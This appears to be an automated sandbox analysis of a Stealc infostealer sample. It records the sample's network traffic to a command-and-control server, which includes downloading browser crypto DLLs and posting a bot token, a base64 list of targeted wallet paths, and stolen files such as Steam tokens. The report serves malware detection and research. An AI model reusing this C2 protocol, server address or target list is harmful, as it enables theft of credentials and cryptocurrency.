06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 24, 2024 13:54:21.989468098 CEST	88	OUT	GET /fee3b98529eb4b43/nss3.dll HTTP/1.1 Host: 95.182.96.50 Cache-Control: no-cache
Oct 24, 2024 13:54:22.218609095 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:22 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 24, 2024 13:54:23.833694935 CEST	92	OUT	GET /fee3b98529eb4b43/softokn3.dll HTTP/1.1 Host: 95.182.96.50 Cache-Control: no-cache
Oct 24, 2024 13:54:24.062932014 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:23 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 24, 2024 13:54:24.345268011 CEST	96	OUT	GET /fee3b98529eb4b43/vcruntime140.dll HTTP/1.1 Host: 95.182.96.50 Cache-Control: no-cache
Oct 24, 2024 13:54:24.577733040 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 24, 2024 13:54:25.070251942 CEST	199	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA Host: 95.182.96.50 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 13:54:25.357966900 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:25.407032967 CEST	466	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF Host: 95.182.96.50 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="message"wallets------FIEHDBGDHDAECBGDHJKF--
Oct 24, 2024 13:54:25.641701937 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:25 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 24, 2024 13:54:25.644329071 CEST	464	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAK Host: 95.182.96.50 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="message"files------GHIJJJEGDBFHDHJJDBAK--
Oct 24, 2024 13:54:25.878628969 CEST	259	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 56 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 66 43 56 45 52 56 4e 4c 56 45 39 51 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4d 73 4b 69 35 77 5a 47 5a 38 4d 54 41 77 66 44 46 38 4d 48 77 77 66 41 3d 3d Data Ascii: fCVERVNLVE9QJVx8Ki50eHQsKi5kb2MsKi5wZGZ8MTAwfDF8MHwwfA==
Oct 24, 2024 13:54:25.894679070 CEST	562	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEH Host: 95.182.96.50 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="file"------CBAKFCBFHJDHJKECAKEH--
Oct 24, 2024 13:54:26.160271883 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:26.551328897 CEST	202	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ Host: 95.182.96.50 Content-Length: 115363 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 13:54:27.410845995 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:27.450372934 CEST	471	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI Host: 95.182.96.50 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"ybncbhylepme------BKECAEBGHDAEBFHIEGHI--
Oct 24, 2024 13:54:27.706806898 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:27.708287001 CEST	471	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAE Host: 95.182.96.50 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIIIJDAAAAAAKECBFBAE--
Oct 24, 2024 13:54:27.990761995 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	07:54:02
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\fXg8zgxVTF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\fXg8zgxVTF.exe"
Imagebase:	0x400000
File size:	9'743'208 bytes
MD5 hash:	C7CA98803A76B62A6A379A0B684B162A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.1%
Total number of Nodes:	53
Total number of Limit Nodes:	4

Executed Functions

Function 00418E5F Relevance: 1.6, APIs: 1, Instructions: 125
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(-08F7245D), ref: 00418EDD

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cab027ed215cb2ad2011fd29a65e51a430b34c32e0adbc8fad54f17f1d9c2a42
Instruction ID: 17dda1a84128b8c12b9cfccbf0872fdd675b910d0447e345e5b04c139098d835
Opcode Fuzzy Hash: cab027ed215cb2ad2011fd29a65e51a430b34c32e0adbc8fad54f17f1d9c2a42
Instruction Fuzzy Hash: 94410A72C417148FD388EFB7EC8685936A2FBD1319305463FE80796066DE3C19469A9E

Function 00418E1A Relevance: 1.6, APIs: 1, Instructions: 111
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(-08F7245D), ref: 00418EDD

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
